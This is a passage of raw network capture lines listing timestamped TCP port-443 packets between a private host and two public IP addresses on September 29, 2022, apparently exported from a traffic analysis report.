                                                                                                                                                    Sep 29, 2022 14:59:00.785016060 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785031080 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785367012 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.785381079 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785408020 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785415888 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785471916 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.785478115 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785621881 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.785641909 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785717010 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.785779953 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785784006 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.785795927 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785815954 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785876989 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.785887957 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785917997 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785947084 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785948038 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.785960913 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.785984993 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.786035061 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.786052942 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.786073923 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.786197901 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.786209106 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.786324978 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.788017035 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.788033962 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.788233995 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.789774895 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.789793015 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.789808989 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.789834976 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.789876938 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.789885044 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.790031910 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.790043116 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.790098906 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.790107012 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.790193081 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.790237904 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.797806978 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.797818899 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.797858953 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.798069954 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.800214052 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.800223112 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.800256968 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.800281048 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.800465107 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.800472975 CEST44349731185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:00.800580978 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.805104017 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.806118965 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:00.830827951 CEST49731443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.381752968 CEST49732443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:01.381809950 CEST44349732140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.381937981 CEST49732443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:01.382364035 CEST49732443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:01.382380962 CEST44349732140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.438500881 CEST44349732140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.440572023 CEST49732443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:01.440606117 CEST44349732140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.473725080 CEST44349732140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.473850965 CEST44349732140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.473913908 CEST49732443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:01.473928928 CEST44349732140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.473972082 CEST49732443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:01.474721909 CEST49732443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:01.475903988 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.475955009 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.476036072 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.477984905 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.478007078 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.516624928 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.522005081 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.522034883 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.781980038 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.782080889 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.782124996 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.782156944 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.782200098 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.782237053 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.782277107 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.782313108 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.782321930 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.782361984 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.782385111 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.782403946 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.782437086 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.782461882 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.782473087 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.782537937 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.782563925 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.785708904 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.785742044 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.785909891 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.785934925 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.800512075 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.800546885 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.800795078 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.800823927 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.802794933 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.802822113 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.803205967 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.803221941 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.804523945 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.804546118 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.805001974 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.805012941 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.806726933 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.806757927 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.806816101 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.806832075 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.806863070 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.815179110 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.815203905 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.815335035 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.815375090 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.816633940 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.816668034 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.816714048 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.816729069 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.816744089 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.816766977 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.816797018 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.816808939 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.816843987 CEST44349733185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.816879988 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.825073957 CEST49733443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:01.951231956 CEST49734443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:01.951280117 CEST44349734140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:01.951378107 CEST49734443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:01.951878071 CEST49734443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:01.951905012 CEST44349734140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.000289917 CEST44349734140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.002281904 CEST49734443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:02.002310038 CEST44349734140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.034379959 CEST44349734140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.034512043 CEST44349734140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.034595013 CEST44349734140.82.121.3192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.034594059 CEST49734443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:02.034642935 CEST49734443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:02.035387039 CEST49734443192.168.2.3140.82.121.3
                                                                                                                                                    Sep 29, 2022 14:59:02.036715984 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.036784887 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.036887884 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.037316084 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.037348986 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.078254938 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.093610048 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.093664885 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.316103935 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.316175938 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.316211939 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.316245079 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.316247940 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.316277981 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.316312075 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.316323042 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.316356897 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.316356897 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.316369057 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.316401958 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.316559076 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.316626072 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.316669941 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.316678047 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.317395926 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.317460060 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.317468882 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.320987940 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.321021080 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.321115017 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.321135044 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.321186066 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.335115910 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.335149050 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.335218906 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.335239887 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.335303068 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.335438967 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.335458994 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.335490942 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.335499048 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.335515022 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.337661028 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.337718964 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.337781906 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.337795973 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.337831974 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.339422941 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.339467049 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.339529037 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.339541912 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.339560986 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.350142956 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.350183964 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.350323915 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.350347042 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.351243019 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.351267099 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.351347923 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.364204884 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.364228010 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.364315033 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.368021965 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.368041039 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.368061066 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.368069887 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.368164062 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.368170977 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.368256092 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.390050888 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.390081882 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.390194893 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.390292883 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.390297890 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.390311956 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.390404940 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.390471935 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.396992922 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.397016048 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.397130966 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.397267103 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.397289991 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.397320986 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.397408009 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.397449017 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.398441076 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.398449898 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.398536921 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.398700953 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.398705006 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.398720980 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.398792982 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.398847103 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.399770021 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.399777889 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.399858952 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.399996996 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.400002003 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.400016069 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.400082111 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.400142908 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.401113033 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.401118994 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.401201963 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.401375055 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.401379108 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.401391983 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.401460886 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.401515961 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.402292967 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.402299881 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.402378082 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.402652025 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.402658939 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.402669907 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.402739048 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.402798891 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.403783083 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.403793097 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.403882980 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.404130936 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.404136896 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.404150009 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.404212952 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.404256105 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.405177116 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.405184031 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.405266047 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.405586004 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.405591965 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.405613899 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.405672073 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.405730963 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.406512022 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.406521082 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.406601906 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.406945944 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.406955004 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.406970024 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.407021046 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.407077074 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.407737970 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.407748938 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.407839060 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.408257961 CEST49735443192.168.2.3185.199.108.133
                                                                                                                                                    Sep 29, 2022 14:59:02.408268929 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.408282042 CEST44349735185.199.108.133192.168.2.3
                                                                                                                                                    Sep 29, 2022 14:59:02.408335924 CEST49735443192.168.2.3185.199.108.133
